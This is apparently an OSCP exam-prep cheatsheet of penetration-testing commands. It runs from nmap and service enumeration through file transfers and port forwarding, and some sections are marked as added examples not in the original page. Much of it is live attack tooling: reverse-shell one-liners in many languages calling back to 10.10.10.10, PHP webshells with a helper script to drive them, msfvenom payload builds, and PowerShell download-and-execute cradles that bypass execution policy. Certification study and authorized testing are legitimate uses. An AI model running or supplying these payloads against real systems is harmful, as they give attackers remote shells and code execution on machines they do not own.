Preparing for the OSCP (Offensive Security Certified Professional) exam can feel like a daunting task, but having a handy cheatsheet can make a world of difference. Whether you’re just starting out or brushing up on your skills, this cheatsheet is designed to give you quick access to essential commands, tools, and techniques you’ll need to tackle the OSCP exam.

Let’s dive in and make your OSCP journey a little smoother and a lot more manageable!

General Enumeration – Nmap

Replace $ip with target IP

Initial scan

 nmap -Pn -n -vvv -oN nmap/initial $ip

If no ports are found, scan in parts

 nmap -Pn -n -vvv -p1-500 -oN nmap/partial $ip

Scan all ports

 nmap -Pn -n -vvv -p- -oN nmap/allports $ip

Targeted scanning

 nmap -Pn -n -vvv -p22,80 -oN nmap/targeted $ip

UDP Scanning

sudo nmap -Pn -n -vvv -sU -oN nmap/udp $ip

Automated nmap scanning (my preference is nmapAutomator, never missed a port)

# It is recommended to scan ONE IP at a time
# Do NOT overload the network
# All scans, consecutively: Quick, Targeted, UDP, All ports, Vuln scan, CVE scan, Gobuster, Nikto
 nmapAutomator $ip All
 telnet $ip <port>
 nc -nv $ip <port>
 curl -iv $ip
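The scans above are normally chained by hand: all-ports scan first, then -sC -sV only on what was open. The script below is an added example (not part of the original cheatsheet) that automates that hand-off by parsing nmap's grepable output; it assumes nmap is installed, that $1 is the target IP, and that output is written under ./nmap/ as in the commands above.

```bash
#!/usr/bin/env bash
# Added example: chain the all-ports scan into the targeted -sC -sV scan.
# Assumes: nmap installed, $1 = target IP, results stored under ./nmap/.

# Parse an nmap grepable (-oG) file and print the open TCP ports as "22,80,445".
# Port entries in that format look like: 22/open/tcp//ssh///, 80/open/tcp//http///
open_ports_from_gnmap() {
    grep -h '^Host:' "$1" \
      | grep -o '[0-9]*/open/' \
      | cut -d/ -f1 \
      | sort -un \
      | paste -sd, -
}

enum_host() {
    ip="$1"
    mkdir -p nmap
    # 1. all TCP ports, no ping, no DNS; -oA also writes the .gnmap file parsed below
    nmap -Pn -n -vvv -p- -oA "nmap/allports_${ip}" "$ip"
    ports="$(open_ports_from_gnmap "nmap/allports_${ip}.gnmap")"
    if [ -z "$ports" ]; then
        echo "[-] no open TCP ports found on $ip; fall back to the partial and UDP scans" >&2
        return 1
    fi
    echo "[+] open TCP ports on $ip: $ports"
    # 2. default scripts + version detection only on the ports that are actually open
    nmap -Pn -n -vvv -p "$ports" -sC -sV -oN "nmap/targeted_${ip}" "$ip"
}

# Usage: ./enum.sh 10.11.1.5
if [ -n "${1:-}" ]; then
    enum_host "$1"
fi
```

Keep one target per run, as the cheatsheet recommends; the parser ignores filtered and open|filtered entries on purpose, so UDP results still need the separate -sU scan.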

Port 21 – FTP

Nmap script scanning – will reveal anonymous access

 nmap -Pn -n -vvv -p21 -sC -sV $ip

Checking anonymous access manually

 ftp $ip
ftp> USER anonymous
ftp> PASS anonymous

Easy view of FTP content – Browse to:

ftp://$ip

Uploading a binary or webshell

ftp> binary
ftp> put file/name

Port 22 – SSH

Additional banner grabbing

 ssh root@$ip

Port 53 – DNS

# Get nameservers and domain name of the IP address
nslookup
nslookup> server $target_ip
nslookup> $target
# o/p: ns1.example.com

# Zone transfer (AXFR): lists every record, including sub-domains, if the server allows it
host -l -a example.com $target_ip # or ns1.example.com

Port 79 – Finger

Run a finger user-enumeration script with the following wordlist

/usr/share/metasploit-framework/data/wordlists/unix_users.txt

Port 80/443 – HTTP(S)

Get web server, version, potential OS

curl -i http://$ip

Use Wappalyzer to identify technologies, web server, OS, database server deployed

View-Source of pages to find interesting comments, directories, technologies, web application being used, etc.

Finding hidden content

Scanning each sub-domain and interesting directory is a good idea

# Use small common wordlist first
# Use big wordlist next
# Use CMS specific wordlist if one is found
gobuster dir -u http://$ip -w /wordlist -o gobust.out
# Find technology specific content
gobuster dir -u http://$ip -w /wordlist -o gobust_php.out -x php
# Find hidden notes, readme, changelog
gobuster dir -u http://$ip -w /wordlist -o gobust_txt.out -x txt

Files to browse manually

/robots.txt
/sitemap.xml
# Make it throw an error
/doesnotexist

Run web server scanning

# Identifies CMS
# Identifies Shellshock
nikto -host $ip -o nikto.txt

Web application-specific scanning

WordPress: wpscan (register for a free WPScan API token and pass it with --api-token, otherwise no vulnerability data is returned)

wpscan --url http://$ip -e p,t,u --detection-mode aggressive > wpscan.log

Drupal: droopescan

droopescan scan drupal http://$ip -t 32

Port 110 – POP3

# Login
telnet $ip 110
USER test
PASS test

# List and view mails
# O/P: <mail_number> <mail_length>
list
# View mail
retr <mail_number>
quit

Port 139/445 – SMB

General enumeration

nmap -Pn -n -p139,445 --script "smb-*" $ip
enum4linux -a $ip

Enumerate hostname

nmblookup -A $ip

Get version – script available here

./smbver.sh $ip [port]
msf>use auxiliary/scanner/smb/smb_version

List shares Note: smbmap will state access type available, smbclient will NOT. To check access type using smbclient, it’s best to access each share, read a file, and write a file.

smbmap -H $ip
# Get share items recursively
smbmap -H $ip -R <share>
smbmap -H $ip -d <domain> -u <user> -p <password>
smbclient -L //$ip -N
# Protocol Error? Old servers only speak SMBv1
smbclient -L //$ip -N --option='client min protocol=NT1'
smbclient -L //$ip -U <user>

Connecting to a share

# Anonymously
smbclient //$ip/share -N
# Authenticated
smbclient //$ip/share -U <username>
# Protocol Error?
smbclient //$ip/share -N --option='client min protocol=NT1'

Port 161 – SNMP

MIB values (Windows parameters)

1.3.6.1.2.1.25.1.6.0      System Processes
1.3.6.1.2.1.25.4.2.1.2    Running Programs
1.3.6.1.2.1.25.4.2.1.4    Processes Path
1.3.6.1.2.1.25.2.3.1.4    Storage Units
1.3.6.1.2.1.25.6.3.1.2    Software Name
1.3.6.1.4.1.77.1.2.25     User Accounts
1.3.6.1.2.1.6.13.1.3      TCP Local Ports

# Brute force community strings
# echo public > community
# echo private >> community
# echo manager >> community
# for ip in $(seq 1 254);do echo 10.11.1.$ip;done > snmp-ips
onesixtyone -c community -i snmp-ips

# Enumerate entire MIB tree
snmpwalk -c public -v1 $ip
# Enumerate specific MIB Value
snmpwalk -c public -v1 $ip $MIB_Value

snmp-check $ip
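The OID table above is only useful once each branch is walked and the values pulled out. The script below is an added example (not from the original page): it walks every OID in the table into its own file and extracts clean STRING values (for example the usernames under 1.3.6.1.4.1.77.1.2.25) from raw snmpwalk output. It assumes net-snmp's snmpwalk is installed and the community string is "public" unless another is passed.

```bash
#!/usr/bin/env bash
# Added example: walk the Windows OIDs from the table above and parse the results.
# Assumes snmpwalk (net-snmp) is installed; community defaults to "public".

# Extract the quoted STRING values from snmpwalk output, one per line, duplicates removed.
# Raw lines look like: iso.3.6.1.4.1.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
snmp_strings() {
    sed -n 's/.*= STRING: "\(.*\)"$/\1/p' "$1" | sort -u
}

# Enumerate the user accounts branch and print usernames.
snmp_users() {
    ip="$1"; community="${2:-public}"; out="snmp_users_${ip}.txt"
    snmpwalk -c "$community" -v1 "$ip" 1.3.6.1.4.1.77.1.2.25 > "$out"
    snmp_strings "$out"
}

# Walk every branch from the table and store each under snmp/<label>.txt.
snmp_enum() {
    ip="$1"; community="${2:-public}"
    mkdir -p snmp
    while read -r oid label; do
        snmpwalk -c "$community" -v1 "$ip" "$oid" > "snmp/${label}.txt"
        echo "[+] $label: $(wc -l < "snmp/${label}.txt") entries"
    done <<EOF
1.3.6.1.2.1.25.1.6.0 system_processes
1.3.6.1.2.1.25.4.2.1.2 running_programs
1.3.6.1.2.1.25.4.2.1.4 process_paths
1.3.6.1.2.1.25.2.3.1.4 storage_units
1.3.6.1.2.1.25.6.3.1.2 software_names
1.3.6.1.4.1.77.1.2.25 user_accounts
1.3.6.1.2.1.6.13.1.3 tcp_local_ports
EOF
}

# Usage:
#   snmp_enum 10.11.1.5            # all branches, community "public"
#   snmp_users 10.11.1.5 private   # usernames only, community "private"
```

If snmpwalk returns nothing, try -v2c before assuming SNMP is closed; a community string that works on v1 often works on v2c and returns more data.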

Port 2049 – NFS

# NFS < v4
# Enumerating shares available, and mount points
showmount -e $ip
showmount -a $ip

# Mounting, x = NFS Version
mount -t nfs -o vers=x $ip:<share> <local_dir>

# On target machine
# Mounts flagged nosuid/noexec will not honour SUID bits or run scripts;
# pick a writable mount point that is NOT in this list when dropping a SUID binary
mount | grep 'nosuid\|noexec'

Shells / Payloads

Universal Listeners

# Netcat
[sudo] rlwrap nc -nvlp <port>

# msf multi/handler
msf(exploit/multi/handler)> set payload path/to/payload
msf(exploit/multi/handler)> set LHOST <ip> # or <interface>
msf(exploit/multi/handler)> set LPORT <port>

Linux


One-liners

Credit to Pentest Monkey

# bash
/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.10.10/443 0>&1"

# Perl
perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# PHP - assumes the socket lands on file descriptor 3; try 4, 5 or 6 if no shell comes back
php -r '$sock=fsockopen("10.10.10.10",443);exec("/bin/sh -i <&3 >&3 2>&3");'

# Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# Netcat : -u for UDP
nc [-u] 10.10.10.10 443 -e /bin/bash

# Netcat without -e : -u for UDP
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc [-u] 10.10.10.10 443 > /tmp/f

# Java (Groovy syntax, as on Pentest Monkey)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Reverse shell scripts

PHP reverse shell available here or locally /usr/share/webshells/php/php-reverse-shell

Python PTY shells available here

Windows

PowerShell reverse shell (nishang Invoke-PowerShellTcp), PHP reverse shell and Netcat for Windows (nc.exe) are all available online.

# PowerShell
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1
vi shell.ps1
# go to end of file, paste the following
Invoke-PowerShellTcp -Reverse -IPAddress [attacker_ip] -Port [attacker_port]
# close, reverse shell ready to use

# Netcat - use x64 or x32 as per target. powershell.exe or cmd.exe
nc.exe x.x.x.x <port> -e powershell.exe

PHP Webshells

# Basic. system() or shell_exec() or exec()
<?php system($_GET['cmd']);?>

# More functional: fetch a file from your box (?fupload=name) and run commands (?cmd=...)
<?php
$ip = 'http://10.10.14.4/'; // [:port] - change this to your attacking host
// Upload: saves the named file from $ip into the webshell's own directory
if (isset($_GET['fupload'])) {
    file_put_contents($_GET['fupload'], file_get_contents($ip . $_GET['fupload']));
}
// Execute code. shell_exec() returns all output; exec() returns only the LAST line; system() prints directly
if (isset($_GET['cmd'])) {
    echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
}
?>
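Driving the webshell above with curl is where most people lose time: spaces, semicolons and ampersands in ?cmd= are split or dropped unless they are URL-encoded. The helper below is an added example (not from the original page) that percent-encodes a command and calls the shell; the upload path http://<target>/uploads/shell.php in the usage lines is a hypothetical location.

```bash
#!/usr/bin/env bash
# Added example: client-side helper for the PHP webshell above.
# Assumes the shell is reachable at the URL you pass as $1 (hypothetical path in the usage).

# Percent-encode every ASCII byte that is not unreserved per RFC 3986 (A-Z a-z 0-9 - _ . ~).
urlencode() {
    s="$1"; out=""
    while [ -n "$s" ]; do
        c="${s%"${s#?}"}"   # first character
        s="${s#?}"          # remainder
        case "$c" in
            [A-Za-z0-9.~_-]) out="$out$c" ;;
            *) out="$out$(printf '%%%02X' "'$c")" ;;
        esac
    done
    printf '%s' "$out"
}

# Build the request URL for a command.
webshell_url() {
    printf '%s?cmd=%s' "$1" "$(urlencode "$2")"
}

# Run one command through the webshell and print its output without the <pre> wrapper.
webshell_exec() {
    curl -s "$(webshell_url "$1" "$2")" | sed -e 's/<pre>//' -e 's#</pre>##'
}

# Ask the webshell to pull a file from the $ip configured inside it (the ?fupload= branch).
webshell_fetch() {
    curl -s "$1?fupload=$(urlencode "$2")"
}

# Usage:
#   webshell_exec  "http://10.11.1.5/uploads/shell.php" "id; uname -a"
#   webshell_exec  "http://10.11.1.5/uploads/shell.php" "cat /etc/passwd"
#   webshell_fetch "http://10.11.1.5/uploads/shell.php" "linpeas.sh"
```

Because the shell uses GET, every command also lands in the web server's access log in encoded form; that is fine in the lab, but it is the reason a real engagement would move to POST or to a proper reverse shell as soon as possible.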

Metasploit

System Binaries

# Linux reverse shell - Staged
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell
# Linux reverse shell - Stageless
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell

# Windows reverse shell - Staged (x86; use windows/x64/shell/reverse_tcp for 64-bit targets)
msfvenom -p windows/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o reverse.exe
# Windows reverse shell - Stageless (x64; use windows/shell_reverse_tcp for 32-bit targets)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o reverse.exe

Web

# PHP
msfvenom -p php/reverse_php LHOST=<ip> LPORT=<port> -f raw -o shell.php

# ASPX
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f aspx -o shell.aspx

# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f raw -o shell.jsp

# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f war -o shell.war

Shellcode

Select appropriate architecture

# Linux Staged - use python or c
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f python
# Linux Stageless - use python or c
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f python

# Windows Staged - use python or c
msfvenom -p windows/x64/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f python
# Windows Stageless - use python or c
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f python

Upgrading your shell – Linux

Upon initial access, it is crucial to achieve the highest functional shell possible for privesc purposes!

# On victim machine
which python python3
python3 -c 'import pty;pty.spawn("/bin/bash")'   # or python for python2
# Ctrl+Z to background the shell; you are now back in your own terminal
stty -a # note the number of rows and columns of YOUR terminal
stty raw -echo; fg # raw mode so Ctrl+C and tab-completion reach the victim, then foreground
# back in the victim shell:
stty rows xx
stty columns xxx
export TERM=xterm-256color

File Transfers

Server

# HTTP - Apache2
# cp file /var/www/html/file_name
sudo service apache2 start

# HTTP - Python. Default port 8000
# python2
sudo python -m SimpleHTTPServer 80
# python3
sudo python3 -m http.server 80

# SMB
sudo impacket-smbserver <share_name> <path/to/share>

# FTP
# apt-get install python-pyftpdlib
sudo python -m pyftpdlib -p 21

# TFTP (UDP)
sudo atftpd --daemon --port 69 /path/to/serve

# Netcat
nc -nvlp <port> < file/to/send

Linux – HTTP

# Wget
wget http://<ip>/file_name -O /path/to/save/file

# Netcat
nc -nv <ip> <port> > file/to/recv

# cURL
curl http://<ip>/file_name --output file_name

Windows

  • HTTP
# Does not save file on the system
powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://<ip>/<file_name>')"
# Saves file on the system
powershell.exe -nop -ep bypass -c "iwr -uri http://<ip>/<file_name> -outfile path/to/save/file_name"
powershell.exe -nop -ep bypass -c "(New-Object Net.WebClient).DownloadFile('http://<ip>/<file_name>','path/to/save/file_name')"

certutil.exe -urlcache -split -f http://<ip>/file file_save
* Wget.ps1 - build a downloader script line by line from cmd.exe, then run it
echo $storageDir = $pwd >> wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
# Download file from
echo $url = "http://<ip>/file_name" >> wget.ps1
# Save file as
echo $file = "file_name" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
# execute the script as follows
powershell.exe -nop -ep bypass -nol -noni -f wget.ps1

  • TFTP (UDP)
tftp -i <ip> get file_name

  • SMB
# cmd.exe
net use Z: \\<attacker_ip>\share_name
# To access the drive
Z:
# PowerShell
New-PSDrive -Name "notmalicious" -PSProvider "FileSystem" -Root "\\attacker_ip\share_name"
# To access the drive
notmalicious:
  • FTP
ftp <ip>
ftp>binary
ftp>get file_name

# Non-interactive downloader: write an ftp script from cmd.exe, then run it with -s
# in cmd.exe do not use quotes in an echo command
echo open <ip> >> download.txt
echo anonymous >> download.txt
echo anon >> download.txt
echo binary >> download.txt
echo get file_name >> download.txt
echo bye >> download.txt
ftp -s:download.txt
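Whichever transfer method above is used, a file that arrived truncated or went through FTP in ASCII mode will silently fail to run. The script below is an added example (not part of the original cheatsheet) that stages tools in the web root together with a SHA256SUMS manifest and verifies a downloaded copy against it; it assumes sha256sum (coreutils) on the Linux side and that files are served from ./www with python3 -m http.server as shown earlier. On Windows the same hash comes from certutil -hashfile <file> SHA256.

```bash
#!/usr/bin/env bash
# Added example: hash manifest for transferred tools.
# Assumes sha256sum is available and ./www is the directory served over HTTP.

WWW_DIR="${WWW_DIR:-./www}"

# Print the SHA-256 of a file (same value certutil -hashfile <file> SHA256 prints on Windows).
sha256_of() {
    sha256sum "$1" | cut -d' ' -f1
}

# Copy a tool into the web root and append its hash to the manifest.
stage_file() {
    src="$1"; name="$(basename "$src")"
    mkdir -p "$WWW_DIR"
    cp "$src" "$WWW_DIR/$name"
    printf '%s  %s\n' "$(sha256_of "$src")" "$name" >> "$WWW_DIR/SHA256SUMS"
    echo "[+] staged $name ($(sha256_of "$src"))"
}

# Verify a downloaded file against the manifest; returns 0 on match, 1 otherwise.
# On the Linux target: wget http://<ip>/SHA256SUMS http://<ip>/<file>; verify_file <file> SHA256SUMS
verify_file() {
    file="$1"; manifest="$2"
    expected="$(awk -v n="$(basename "$file")" '$2 == n { print $1; exit }' "$manifest")"
    if [ -z "$expected" ]; then
        echo "[-] $(basename "$file") not in manifest" >&2
        return 1
    fi
    actual="$(sha256_of "$file")"
    if [ "$expected" = "$actual" ]; then
        echo "[+] $file OK"
        return 0
    fi
    echo "[-] $file hash mismatch: expected $expected got $actual" >&2
    return 1
}

# Usage on Kali:
#   stage_file /usr/share/windows-resources/binaries/nc.exe
#   cd "$WWW_DIR" && sudo python3 -m http.server 80
```

The manifest is plain sha256sum output, so on a target that has coreutils `sha256sum -c SHA256SUMS` checks everything at once; verify_file is the single-file form for boxes where you only fetched one tool.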

Port Forwarding

Linux

  • Local port forwarding: expose <remote_host>:<remote_port> (as reachable from the gateway) on your own <local_port_to_listen_to>
ssh <gateway> -L <local_port_to_listen_to>:<remote_host>:<remote_port>
  • Remote port forwarding: expose your <local_host>:<local_port> on the gateway's <remote_port>
ssh <gateway> -R <remote_port>:<local_host>:<local_port>
  • Dynamic port forwarding: SOCKS proxy on <local proxy port>, use it with proxychains; -p is the target's SSH port
ssh -D <local proxy port> -p <ssh port> <target>

Windows

Chisel is a port forwarding tool for Linux as well as Windows, works over HTTP, and can be found here.

# On KALI
./chisel server --reverse --port 9001
# On Windows
.\chisel.exe client KALI_IP:9001 R:KALI_PORT:127.0.0.1:WINDOWS_PORT
